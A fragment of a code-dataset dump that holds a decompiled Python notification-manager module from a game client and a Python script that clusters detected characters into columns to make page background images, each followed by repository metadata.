"line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 10, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 10, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "37023044171", "text": "#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\scriber\\hermes\\__init__.py\r\nimport datetime\r\nimport uuid\r\nimport json\r\nimport typeutils\r\nimport logging\r\nlog = logging.getLogger('hermes')\r\n\r\nclass UpdateListener(object):\r\n\r\n def __init__(self, user_id, stamp):\r\n self.user_id = user_id\r\n self.stamp = stamp\r\n self.is_triggered = False\r\n self.created = datetime.datetime.now()\r\n self.updated = datetime.datetime.now()\r\n\r\n def __str__(self):\r\n return '' % (self.user_id,\r\n self.stamp,\r\n self.is_triggered,\r\n id(self))\r\n\r\n\r\nclass ReadStatus(object):\r\n\r\n def __init__(self, is_shown = False, is_read = False, is_closed = False, is_dismissed = False):\r\n self.is_shown = is_shown\r\n self.is_read = is_read\r\n self.is_closed = is_closed\r\n self.is_dismissed = is_dismissed\r\n\r\n\r\nclass HermesError(Exception):\r\n pass\r\n\r\n\r\nclass NotificationError(HermesError):\r\n pass\r\n\r\n\r\nclass NotificationNotFound(NotificationError):\r\n pass\r\n\r\n\r\nclass NotificationUpdateError(NotificationError):\r\n pass\r\n\r\n\r\nclass NotificationDismissError(NotificationError):\r\n pass\r\n\r\n\r\nclass Notification(object):\r\n TYPE_INFO = 1\r\n TYPE_WARNING = 2\r\n TYPE_ALERT = 3\r\n PERSISTENCE_SILENT = 1\r\n PERSISTENCE_QUICK = 2\r\n PERSISTENCE_STICKY = 3\r\n\r\n def __init__(self, title, body = None, icon = None, notification_type = None, persistence = None, on_click = None, sender = None, notification_id = None, expires = None, can_dismiss = True, is_shared = False, on_respond = None, hide_recipients = False, channels = None):\r\n self.title = title\r\n self.body = body\r\n self.icon = icon\r\n self.notification_type = notification_type or Notification.TYPE_INFO\r\n self.persistence = persistence or Notification.PERSISTENCE_QUICK\r\n self.on_click = on_click\r\n self.sender = sender\r\n self.expires = expires\r\n self.can_dismiss = can_dismiss\r\n self.is_shared = is_shared\r\n self.on_respond = on_respond\r\n self.hide_recipients = hide_recipients\r\n self.channel_list = []\r\n self._parse_channels(channels)\r\n self.notification_id = notification_id or uuid.uuid4().hex\r\n self.created = datetime.datetime.now()\r\n self.who_is_on_it = None\r\n self.response_datetime = None\r\n self.shared_dismiss = False\r\n self._to_users = None\r\n self._to_user_types = None\r\n self._to_user_roles = None\r\n self._read_status_map = {}\r\n self.update_stamp = 0\r\n\r\n def update_notification(self, notification):\r\n self.title = notification.title\r\n self.body = notification.body\r\n self.icon = notification.icon\r\n self.notification_type = notification.notification_type\r\n self.persistence = notification.persistence\r\n self.on_click = notification.on_click\r\n self.sender = notification.sender\r\n self.expires = notification.expires\r\n self.can_dismiss = notification.can_dismiss\r\n self.is_shared = notification.is_shared\r\n self.on_respond = notification.on_respond\r\n self.who_is_on_it = notification.who_is_on_it\r\n self.response_datetime = notification.response_datetime\r\n self.shared_dismiss = notification.shared_dismiss\r\n self.hide_recipients = notification.hide_recipients\r\n self.channel_list = notification.channel_list\r\n\r\n def to_dict(self, user_id = None, quotes_to_html = False):\r\n fixed_body = self.body\r\n fixed_title = self.title\r\n if quotes_to_html:\r\n fixed_body = fixed_body.replace('\"', '"')\r\n fixed_title = fixed_title.replace('\"', '"')\r\n buff_map = {'title': unicode(fixed_title),\r\n 'body': unicode(fixed_body) if self.body else '',\r\n 'icon': self.icon,\r\n 'notification_type': self.notification_type,\r\n 'persistence': self.persistence,\r\n 'on_click': self.on_click,\r\n 'expires': None if not isinstance(self.expires, datetime.datetime) else self.expires.isoformat(),\r\n 'can_dismiss': self.can_dismiss,\r\n 'is_shared': self.is_shared,\r\n 'on_respond': self.on_respond,\r\n 'notification_id': self.notification_id,\r\n 'created': self.created.isoformat(),\r\n 'who_is_on_it': unicode(self.who_is_on_it),\r\n 'response_datetime': self.response_datetime,\r\n 'hide_recipients': self.hide_recipients,\r\n 'sender': unicode(self.sender) if self.body else '',\r\n 'update_stamp': self.update_stamp,\r\n 'channels': self.channel_list}\r\n if not self.hide_recipients:\r\n buff_map['to_users'] = self._to_users\r\n buff_map['to_user_types'] = self._to_user_types\r\n buff_map['to_user_roles'] = self._to_user_roles\r\n buff_map['is_global'] = self.is_global()\r\n if user_id:\r\n buff_map['is_shown'] = self.is_shown(user_id)\r\n buff_map['is_read'] = self.is_read(user_id)\r\n buff_map['is_closed'] = self.is_closed(user_id)\r\n buff_map['is_dismissed'] = self.is_dismissed(user_id)\r\n return buff_map\r\n\r\n def to_json(self, user_id = None):\r\n return json.dumps(self.to_dict(user_id))\r\n\r\n def mark_shown(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_shown = True\r\n\r\n def mark_read(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_read = True\r\n\r\n def mark_closed(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_closed = True\r\n\r\n def mark_dismissed(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_shown = True\r\n self._read_status_map[user_id].is_dismissed = True\r\n\r\n def is_expired(self):\r\n if self.expires:\r\n return self.expires < datetime.datetime.now()\r\n return False\r\n\r\n def is_global(self):\r\n return not self._to_users and not self._to_user_types and not self._to_user_roles\r\n\r\n def is_shown(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_shown\r\n return False\r\n\r\n def is_read(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_read\r\n return False\r\n\r\n def is_closed(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_closed\r\n return False\r\n\r\n def is_dismissed(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_dismissed\r\n return False\r\n\r\n def in_channels(self, channel_list):\r\n if self.channel_list:\r\n for channel in channel_list:\r\n if channel in self.channel_list:\r\n return True\r\n\r\n return False\r\n else:\r\n return True\r\n\r\n def _parse_channels(self, channels):\r\n if channels:\r\n if not isinstance(channels, (list, tuple)):\r\n channels = [str(channels)]\r\n for chan in channels:\r\n parts = chan.split('.')\r\n for i, chan_part in enumerate(parts):\r\n cc = [chan_part]\r\n while i > 0:\r\n i -= 1\r\n cc.append(parts[i])\r\n\r\n cc.reverse()\r\n sub_chan = '.'.join(cc)\r\n if sub_chan not in self.channel_list:\r\n self.channel_list.append(sub_chan)\r\n\r\n def __repr__(self):\r\n return '' % (self.notification_id, self.title)\r\n\r\n def __str__(self):\r\n return self.__repr__()\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, Notification):\r\n return self.notification_id == other.notification_id\r\n return False\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n def __hash__(self):\r\n return hash(self.notification_id)\r\n\r\n\r\nclass Hermes(object):\r\n\r\n def __init__(self, listener_limit = 10):\r\n self.notification_map = {}\r\n self._by_user_id = {}\r\n self._by_user_type = {}\r\n self._by_user_role = {}\r\n self._global_notification_list = []\r\n now = datetime.datetime.now()\r\n self._update_trigger = (now.year % 2000 * 1000 + now.month * 10 + now.day) * 1000000\r\n self._update_listeners = {}\r\n self._listener_limit = listener_limit\r\n log.info('Hermes::__init__(listener_limit=%s) - _update_trigger=%s' % (listener_limit, self._update_trigger))\r\n\r\n def send_notification(self, notification, users = None, user_types = None, user_role_masks = None):\r\n log.info('Hermes::send_notification() users=%s, user_types=%s, user_role_masks=%s, notification=%s' % (users,\r\n user_types,\r\n user_role_masks,\r\n notification.to_json()))\r\n old_notification = self.get_notification(notification.notification_id)\r\n if old_notification:\r\n self.cancel_notification(old_notification)\r\n notification.update_stamp = self._update_trigger\r\n self.notification_map[notification.notification_id] = notification\r\n if not users and not user_types and not user_role_masks:\r\n self._global_notification_list.append(notification)\r\n else:\r\n if users:\r\n self._send_to_users(notification, users)\r\n if user_types:\r\n self._send_to_user_types(notification, user_types)\r\n if user_role_masks:\r\n self._send_to_user_roles(notification, user_role_masks)\r\n self.trigger_update()\r\n\r\n def update_notification(self, notification):\r\n log.info('Hermes::update_notification() notification=%s' % notification.to_json())\r\n if notification:\r\n if notification.notification_id not in self.notification_map:\r\n raise NotificationUpdateError('Notification not found: notification_id=%s' % notification.notification_id)\r\n self.notification_map[notification.notification_id].update_notification(notification)\r\n self.trigger_update()\r\n\r\n def get_notification(self, notification_id):\r\n if notification_id in self.notification_map:\r\n return self.notification_map[notification_id]\r\n\r\n def cancel_notification(self, notification_or_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n log.debug('Hermes::cancel_notification() notification=%s' % notification.to_json())\r\n if notification:\r\n remove_buffer = []\r\n if notification in self._global_notification_list:\r\n self._global_notification_list.remove(notification)\r\n for notification_batch in (self._by_user_id, self._by_user_type, self._by_user_role):\r\n for key, notification_list in notification_batch.iteritems():\r\n if notification in notification_list:\r\n notification_list.remove(notification)\r\n if not notification_list:\r\n remove_buffer.append((key, notification_batch))\r\n\r\n if notification.notification_id in self.notification_map:\r\n del self.notification_map[notification.notification_id]\r\n for key, dict_ref in remove_buffer:\r\n del dict_ref[key]\r\n\r\n self.trigger_update()\r\n\r\n def get_notification_list(self, user_id, user_type, user_role_mask, channel_list = None):\r\n notification_list = []\r\n expired_list = []\r\n channel_list = channel_list or []\r\n for notification_batch in (self._get_by_user_id(user_id),\r\n self._get_by_user_type(user_type),\r\n self._get_by_user_role_masks(user_role_mask),\r\n self._global_notification_list):\r\n for notification in notification_batch:\r\n if notification.is_expired():\r\n expired_list.append(notification.notification_id)\r\n elif not notification.is_dismissed(user_id) and notification not in notification_list:\r\n if notification.in_channels(channel_list):\r\n notification_list.append(notification)\r\n\r\n for notification_id in expired_list:\r\n self.cancel_notification(notification_id)\r\n\r\n notification_list.sort(key=lambda n: n.created, reverse=True)\r\n return notification_list\r\n\r\n def last_trigger(self):\r\n return self._update_trigger\r\n\r\n def mark_read(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n log.info('Hermes::mark_read(notification_id=%s, user_id=%s)' % (notification.notification_id, user_id))\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_read(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def mark_closed(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_closed(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def respond(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n if notification.is_shared and notification.who_is_on_it:\r\n return notification.who_is_on_it\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_read(user_id)\r\n notification.mark_closed(user_id)\r\n notification.response_datetime = datetime.datetime.now()\r\n notification.who_is_on_it = user_id\r\n self.trigger_update()\r\n return user_id\r\n\r\n def dismiss(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n log.info('Hermes::dismiss(notification_id=%s, user_id=%s)' % (notification.notification_id, user_id))\r\n if not notification.can_dismiss:\r\n raise NotificationDismissError('This notification can not be dismissed')\r\n if notification.is_expired() or notification.is_shared:\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_dismissed(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def get_listener(self, user_id, stamp):\r\n if user_id not in self._update_listeners:\r\n self._update_listeners[user_id] = UpdateListener(user_id, stamp)\r\n self._update_listeners[user_id].updated = datetime.datetime.now()\r\n return self._update_listeners[user_id]\r\n\r\n def remove_listener(self, update_listener):\r\n if update_listener.user_id in self._update_listeners:\r\n del self._update_listeners[update_listener.user_id]\r\n\r\n def trigger_listeners(self):\r\n for user_id, listener in self._update_listeners.items():\r\n if listener.stamp < self._update_trigger:\r\n self.remove_listener(listener)\r\n listener.is_triggered = True\r\n\r\n def trigger_update(self):\r\n self._update_trigger += 1\r\n self.trigger_listeners()\r\n\r\n def _id_to_notification(self, notification_or_id):\r\n if isinstance(notification_or_id, Notification):\r\n notification_or_id = notification_or_id.notification_id\r\n return self.get_notification(notification_or_id)\r\n\r\n def _get_by_user_id(self, user_id):\r\n if user_id in self._by_user_id:\r\n return self._by_user_id[user_id]\r\n return []\r\n\r\n def _get_by_user_type(self, user_type):\r\n if user_type in self._by_user_type:\r\n return self._by_user_type[user_type]\r\n return []\r\n\r\n def _get_by_user_role_masks(self, role_masks):\r\n buff = []\r\n role_list = self._extract_role_list(role_masks)\r\n for role in role_list:\r\n if role in self._by_user_role:\r\n buff.extend(self._by_user_role[role])\r\n\r\n return buff\r\n\r\n def _send_to_users(self, notification, users):\r\n if not hasattr(users, '__iter__'):\r\n users = [users]\r\n for user_id in users:\r\n if user_id not in self._by_user_id:\r\n self._by_user_id[user_id] = []\r\n self._by_user_id[user_id].append(notification)\r\n\r\n notification._to_users = users\r\n\r\n def _send_to_user_types(self, notification, user_types):\r\n if not hasattr(user_types, '__iter__'):\r\n user_types = [user_types]\r\n for user_type in user_types:\r\n if user_type not in self._by_user_type:\r\n self._by_user_type[user_type] = []\r\n self._by_user_type[user_type].append(notification)\r\n\r\n notification._to_user_types = user_types\r\n\r\n def _send_to_user_roles(self, notification, user_role_masks):\r\n role_list = self._extract_role_list(user_role_masks)\r\n for role in role_list:\r\n if role not in self._by_user_role:\r\n self._by_user_role[role] = []\r\n self._by_user_role[role].append(notification)\r\n\r\n notification._to_user_roles = role_list\r\n\r\n @staticmethod\r\n def _extract_role_list(user_role_masks):\r\n role_list = []\r\n if not hasattr(user_role_masks, '__iter__'):\r\n user_role_masks = [user_role_masks]\r\n for role_mask in user_role_masks:\r\n role_list.extend(typeutils.split_bitmask(role_mask))\r\n\r\n return list(set(role_list))\r\n", "repo_name": "connoryang/dec-eve-serenity", "sub_path": "client/scriber/hermes/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 18788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 118, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 247, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 365, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 365, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 387, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 387, "usage_type": "attribute"}, {"api_name": "typeutils.split_bitmask", "line_number": 463, "usage_type": "call"}]} +{"seq_id": "31267186612", "text": "# Cluster detected characters to columns and create background images.\n\nimport argparse\nimport csv\nimport os\nimport os.path as path\nfrom sklearn.cluster import DBSCAN\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom scipy.ndimage import measurements\nimport tqdm\n\n\ndef read_boxes(path_boxes):\n with open(path_boxes, \"r\") as fd:\n reader = csv.reader(\n fd, delimiter=\"\\t\", quoting=csv.QUOTE_NONE, quotechar=\"\"\n )\n boxes = []\n for bbox in reader:\n box = Box(bbox)\n boxes.append(box)\n return boxes\n\n\nclass Cluster:\n\n def __init__(self):\n self.boxes = []\n\n def append(self, box):\n self.boxes.append(box)\n\n def sort(self):\n self.boxes = sorted(self.boxes, key=lambda box: box.yCenter)\n\n def size(self):\n return len(self.boxes)\n\n def xMean(self):\n x = 0\n for box in self.boxes:\n x += box.xCenter\n x /= self.size()\n return x\n\n def __str__(self):\n str = \"Cluster \"\n if len(self.boxes) > 0:\n str += \"xCenter0={:.0f}, yCenter0={:.0f} \".format(self.boxes[0].xCenter, self.boxes[0].yCenter)\n str += \"({} boxes)\".format(self.size())\n return str\n\n\nclass Box:\n\n def __init__(self, bbox):\n self.className = bbox[0]\n self.xStart = int(bbox[1])\n self.yStart = int(bbox[2])\n self.xEnd = int(bbox[3])\n self.yEnd = int(bbox[4])\n self.xCenter = (self.xStart + self.xEnd) / 2\n self.yCenter = (self.yStart + self.yEnd) / 2\n self.width = self.xEnd - self.xStart\n self.height = self.yEnd - self.yStart\n self.area = self.width * self.height\n\n def union(self, other):\n uclassName = self.className\n uxStart = min(self.xStart, other.xStart)\n uyStart = min(self.yStart, other.yStart)\n uxEnd = max(self.xEnd, other.xEnd)\n uyEnd = max(self.yEnd, other.yEnd)\n return Box([uclassName, uxStart, uyStart, uxEnd, uyEnd])\n\n def __str__(self):\n return \"{}_{}_{}_{}_{}_area={}\".format(self.className, self.xStart, self.yStart, self.xEnd, self.yEnd, self.area)\n\n\ndef cluster_columns(boxes, median_box, max_center_deviation, eps, min_samples):\n centers = []\n for box in boxes:\n centers.append([box.xCenter, box.yCenter, median_box.width, median_box.height, max_center_deviation])\n\n def column_distance(box1, box2):\n inf = 100000\n xCenter1 = box1[0]\n xCenter2 = box2[0]\n yCenter1 = box1[1]\n yCenter2 = box2[1]\n column_width = box1[2]\n character_height = box1[3]\n max_center_deviation = box1[4]\n if abs(xCenter1 - xCenter2) / column_width > max_center_deviation:\n return inf\n return abs(yCenter1 - yCenter2) / character_height\n\n X = np.array(centers)\n clustering = DBSCAN(eps=eps, min_samples=min_samples, metric=column_distance).fit(X)\n\n clusters = {}\n boxes_column_ok = []\n outliers_column = []\n for box, label in zip(boxes, clustering.labels_):\n if label < 0:\n outliers_column.append(box)\n else:\n if not label in clusters:\n clusters[label] = Cluster()\n clusters[label].append(box)\n boxes_column_ok.append(box)\n\n columns = []\n for label in clusters:\n column = None\n for box in clusters[label].boxes:\n if column is None:\n column = box\n else:\n column = column.union(box)\n columns.append(column)\n\n max_chars_per_column = 0\n for label in clusters:\n numchars = clusters[label].size()\n if numchars > max_chars_per_column:\n max_chars_per_column = numchars\n\n return columns, boxes_column_ok, outliers_column, max_chars_per_column\n\n\ndef get_empty_patch(columns, text_area, source_img):\n beam_width = 5\n min_width = 10\n min_height = 20\n min_color = 128\n patch_candidates = []\n for i, column in enumerate(columns):\n\n # below column\n\n label = \"below_{}_{}\".format(i, 0)\n x1 = column.xStart\n y1 = column.yEnd\n x2 = column.xEnd\n y2 = text_area.yEnd\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n jmax = min(i + beam_width, len(columns))\n for j in range (i+1, jmax):\n column2 = columns[j]\n label = \"below_{}_{}\".format(i, j)\n y1 = max(y1, column2.yEnd)\n x2 = column2.xEnd\n box = Box([label, x1, y1, x2, y2])\n patch_candidates.append(box)\n\n # above column\n\n label = \"above_{}_{}\".format(i, 0)\n x1 = column.xStart\n y1 = text_area.yStart\n x2 = column.xEnd\n y2 = column.yStart\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n jmax = min(i + beam_width, len(columns))\n for j in range (i+1, jmax):\n column2 = columns[j]\n label = \"above_{}_{}\".format(i, j)\n y1 = min(y1, column2.yStart)\n x2 = column2.xEnd\n box = Box([label, x1, y1, x2, y2])\n patch_candidates.append(box)\n\n # between columns\n\n if i + 1 < len(columns):\n label = \"between_{}_{}\".format(i, i+1)\n column2 = columns[i+1]\n x1 = column.xEnd\n y1 = text_area.yStart\n x2 = column2.xStart\n y2 = text_area.yEnd\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n\n if len(patch_candidates) == 0:\n return None\n\n result = None\n result_value = None\n for cand in patch_candidates:\n size_ok = cand.width > min_width and cand.height > min_height\n if size_ok:\n region = source_img.crop((cand.xStart, cand.yStart, cand.xEnd, cand.yEnd))\n npregion = np.array(region.convert('L'))\n mean = measurements.mean(npregion)\n stdv = measurements.standard_deviation(npregion)\n val = stdv\n color_ok = mean > min_color\n if (result is None or val < result_value) and color_ok:\n result = cand\n result_value = val\n\n return result\n\n\ndef clear_text_area(source_img, text_area, empty_patch):\n patch = source_img.crop((empty_patch.xStart, empty_patch.yStart, empty_patch.xEnd, empty_patch.yEnd))\n stepx = text_area.width // empty_patch.width\n stepy = text_area.height // empty_patch.height\n for i in range(0, stepx + 1):\n for j in range(0, stepy + 1):\n x1 = text_area.xStart + (i * empty_patch.width)\n y1 = text_area.yStart + (j * empty_patch.height)\n if i == stepx:\n x1 = text_area.xEnd - empty_patch.width\n if j == stepy:\n y1 = text_area.yEnd - empty_patch.height\n x2 = x1 + empty_patch.width\n y2 = y1 + empty_patch.height\n source_img.paste(patch, (x1, y1, x2, y2))\n\n\ndef detect_background(options, file_image, file_boxes, file_background, file_chars, file_area, file_view):\n\n # parameters\n\n threshold_boxsize = options.threshold_boxsize # 0.3; width/height cannot deviate more than X from the median width/height\n threshold_x_deviation = options.threshold_x_deviation # 0.1; allowed x deviation (relative to median width) to form a column\n threshold_y_deviation = options.threshold_y_deviation # 2; allowed y deviation (relative to median height) to form a column\n threshold_min_samples = options.threshold_min_samples # 3; minimum characters to form a column\n threshold_min_boxes = options.threshold_min_boxes # 100; minimum boxes per page\n\n # find median box\n\n all_boxes = read_boxes(file_boxes)\n sorted_boxes = sorted(all_boxes, key=lambda box: box.width * box.height)\n median_box = None\n if len(all_boxes) > 0:\n median_box = sorted_boxes[int(len(sorted_boxes) / 2)]\n\n # remove boxes that are too small or too large\n\n boxes_size_ok = []\n outliers_size = []\n for box in all_boxes:\n diff_width = abs(box.width - median_box.width) / median_box.width\n diff_height = abs(box.height - median_box.height) / median_box.height\n if diff_width <= threshold_boxsize or diff_height <= threshold_boxsize:\n boxes_size_ok.append(box)\n else:\n outliers_size.append(box)\n\n # create columns\n\n columns = []\n boxes_column_ok = []\n outliers_column = []\n max_chars_per_column = 0\n if len(boxes_size_ok) > 0:\n columns, boxes_column_ok, outliers_column, max_chars_per_column = cluster_columns(boxes_size_ok, median_box, threshold_x_deviation, threshold_y_deviation, threshold_min_samples)\n if len(columns) > 0:\n columns, _, _, _ = cluster_columns(columns, median_box, 3 * threshold_x_deviation, 100, 1)\n columns = sorted(columns, key=lambda box: box.xCenter)\n\n # create text area\n\n text_area = None\n total_chars = len(boxes_column_ok)\n if total_chars > threshold_min_boxes:\n for column in columns:\n if text_area is None:\n text_area = column\n else:\n text_area = text_area.union(column)\n\n # create background\n\n background_image = Image.open(file_image).convert(\"RGBA\")\n width, height = background_image.size\n empty_patch = None\n if len(columns) > 0 and text_area is not None:\n empty_patch = get_empty_patch(columns, text_area, background_image)\n if empty_patch is not None:\n clear_text_area(background_image, text_area, empty_patch)\n\n factor = 1\n max_size = max(width, height)\n if max_size > 1024:\n factor = 1024 / max_size\n background_image.thumbnail((1024, 1024))\n\n background_image.save(file_background, \"PNG\")\n with open(file_chars, \"w\") as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n name = file_background.split(\"/\")[-1]\n writer_tsv.writerow([name, len(columns), max_chars_per_column, len(all_boxes), len(boxes_size_ok), len(boxes_column_ok), median_box.width, median_box.height, factor])\n with open(file_area, \"w\") as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n writer_tsv.writerow([int(text_area.xStart * factor), int(text_area.yStart * factor), int(text_area.xEnd * factor), int(text_area.yEnd * factor)])\n\n # create view\n\n view_image = Image.open(file_image).convert(\"RGBA\")\n draw = ImageDraw.Draw(view_image)\n for box in outliers_size:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"red\")\n for box in outliers_column:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"blue\")\n for box in boxes_column_ok:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"green\")\n for box in columns:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=4, fill=None, outline=\"yellow\")\n if text_area is not None:\n draw.rectangle(((text_area.xStart, text_area.yStart), (text_area.xEnd, text_area.yEnd)), width=4, fill=None, outline=\"yellow\")\n if empty_patch is not None:\n draw.rectangle(((empty_patch.xStart, empty_patch.yStart), (empty_patch.xEnd, empty_patch.yEnd)), width=8, fill=None, outline=\"cyan\")\n view_image.save(file_view, \"PNG\")\n\n\ndef build_parser() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n\n # required\n\n parser.add_argument(\n \"--experiment\",\n dest=\"exp_dir\",\n required=True,\n type=str,\n help=\"Experiment directory\",\n )\n parser.add_argument(\n \"--image-type\",\n dest=\"img_type\",\n required=True,\n type=str,\n help=\"Image type (jpg, png, ...)\",\n )\n\n # optional\n\n parser.add_argument(\n \"--boxsize\",\n dest=\"threshold_boxsize\",\n required=False,\n type=float,\n default=0.3,\n help=\"Maximum deviation from the median box size\",\n )\n parser.add_argument(\n \"--x-deviation\",\n dest=\"threshold_x_deviation\",\n required=False,\n type=float,\n default=0.1,\n help=\"Maximum horizontal deviation in text column (relative to median box width)\",\n )\n parser.add_argument(\n \"--y-deviation\",\n dest=\"threshold_y_deviation\",\n required=False,\n type=float,\n default=2.0,\n help=\"Maximum vertical gap in text column (relative to median box height)\",\n )\n parser.add_argument(\n \"--min-samples\",\n dest=\"threshold_min_samples\",\n required=False,\n type=int,\n default=3,\n help=\"Minimum number of characters in text column\",\n )\n parser.add_argument(\n \"--min-boxes\",\n dest=\"threshold_min_boxes\",\n required=False,\n type=int,\n default=100,\n help=\"Minimum number of selected boxes on page\",\n )\n\n return parser\n\n\nif __name__ == \"__main__\":\n options = build_parser().parse_args()\n exp_dir = options.exp_dir\n img_type_lower = options.img_type.lower()\n img_type_upper = options.img_type.upper()\n\n dir_detected = path.join(exp_dir, \"detected\")\n dir_background = path.join(exp_dir, \"background_images\")\n dir_background_chars = path.join(exp_dir, \"background_chars\")\n dir_background_area = path.join(exp_dir, \"background_areas\")\n dir_background_view = path.join(exp_dir, \"background_view\")\n if not path.exists(dir_background):\n os.makedirs(dir_background)\n if not path.exists(dir_background_chars):\n os.makedirs(dir_background_chars)\n if not path.exists(dir_background_area):\n os.makedirs(dir_background_area)\n if not path.exists(dir_background_view):\n os.makedirs(dir_background_view)\n\n print(\"Detect background ..\")\n files = sorted(os.listdir(dir_detected))\n log_page = tqdm.tqdm(total=len(files), desc='Create background', position=1)\n for filename in files:\n if filename.endswith(\".{}\".format(img_type_lower)) or filename.endswith(\".{}\".format(img_type_upper)):\n file_image = os.path.join(dir_detected, filename)\n file_boxes = os.path.join(dir_detected, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_background = os.path.join(dir_background, \"{}.png\".format(filename.split(\".\")[0]))\n file_chars = os.path.join(dir_background_chars, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_area = os.path.join(dir_background_area, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_view = os.path.join(dir_background_view, \"{}.png\".format(filename.split(\".\")[0]))\n detect_background(options, file_image, file_boxes, file_background, file_chars, file_area, file_view)\n log_page.update(1)\n\n file_colchars = os.path.join(dir_background, \"background_col_char.tsv\")\n colchars = []\n for filename in sorted(os.listdir(dir_background_chars)):\n if filename.endswith(\".tsv\"):\n file_tsv = os.path.join(dir_background_chars, filename)\n with open(file_tsv, \"r\") as fd:\n reader = csv.reader(fd, delimiter=\"\\t\", quoting=csv.QUOTE_NONE, quotechar=\"\")\n for line in reader:\n colchars.append([line[0], line[1], line[2]])\n with open(file_colchars, 'w') as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n for line in colchars:\n writer_tsv.writerow(line)\n\n", "repo_name": "asciusb/annotationfree", "sub_path": "selftrain/background.py", "file_name": "background.py", "file_ext": "py", "file_size_in_byte": 15540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.cluster.DBSCAN", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.ndimage.measurements.mean", "line_number": 196, "usage_type": "call"}, {"api_name": 